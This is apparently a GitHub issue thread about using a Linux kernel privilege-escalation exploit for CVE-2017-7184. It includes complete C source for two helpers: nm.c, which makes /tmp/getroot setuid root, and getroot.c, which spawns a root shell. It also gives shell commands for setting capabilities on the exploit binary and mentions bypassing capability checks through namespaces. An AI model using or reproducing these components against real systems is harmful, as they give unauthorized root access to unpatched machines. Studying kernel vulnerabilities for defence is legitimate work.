the usage of cve-2017-7184
Hi, snorez, what is the usage of cve-2017-7184? Is it `sudo setcap cap_net_raw,cap_net_admin=eip ./xxx`? But it didn't work.
@sucof yes, that should work. Which kernel version are you testing? Oh, also, you need two extra files: "/tmp/nm" (which will setuid /tmp/getroot), and "/tmp/getroot". These files are quite simple. I forgot to mention that, sorry :(.
@snorez, I think using the sudo command is odd for an EoP vulnerability; if someone has the password to use sudo, maybe they have no need for an EoP exploit, right? Also, for creating these two temp files, is it better to use sprintf, mktemp and other code to get the root shell?
For the sudo problem, I think there is a solution:

```
# groupadd -g XXX
# usermod -a -G XXX YYY
# chgrp wireshark path/to/exploit
# chmod 4750 path/to/exploit
# setcap cap_net_raw,cap_net_admin=eip path/to/exploit
```

But I have not tested it :(.
@sucof yes, that is right. There is a way to bypass the capabilities check by using namespaces. I focus on understanding this flaw, so this exploit is more for testing purposes. Thank you for your mention.
@snorez thanks for your reply. I am a newcomer learning EoP on Linux, so forgive my many questions. Can you share your "/tmp/nm" and "/tmp/getroot" files with me? I can't get the root shell. My kernel version is 4.8.0-22-generic, and I am not sure my files are right. Thanks.
@sucof yes,

getroot.c

```c
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

static char *exec_cmd = "/bin/sh";

int main(int argc, char *argv[])
{
    /* Only useful once /tmp/nm has made this binary setuid root:
     * then the effective uid is 0 and we can become root for real. */
    if ((getuid() == 0) || (geteuid() == 0)) {
        setuid(0);
        setgid(0);
        setreuid(0, 0);
        setregid(0, 0);
        execl(exec_cmd, exec_cmd, (char *)NULL);
    } else {
        printf("get root failed\n");
    }
    return 0;
}
```

nm.c

```c
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

char *root_file = "/tmp/getroot";

/* Run as root by the exploit: make /tmp/getroot owned by root
 * and setuid, so a normal user can then run it to get a root shell. */
int main(int argc, char *argv[])
{
    chown(root_file, 0, 0);
    chmod(root_file, S_ISUID | S_IRWXU | S_IRWXG | S_IRWXO);
    return 0;
}
```
BTW, I am also a newbie here.
Here are some more professional exploits: xairy's exploits. Check cve-2017-7308 to see how to bypass the capabilities check.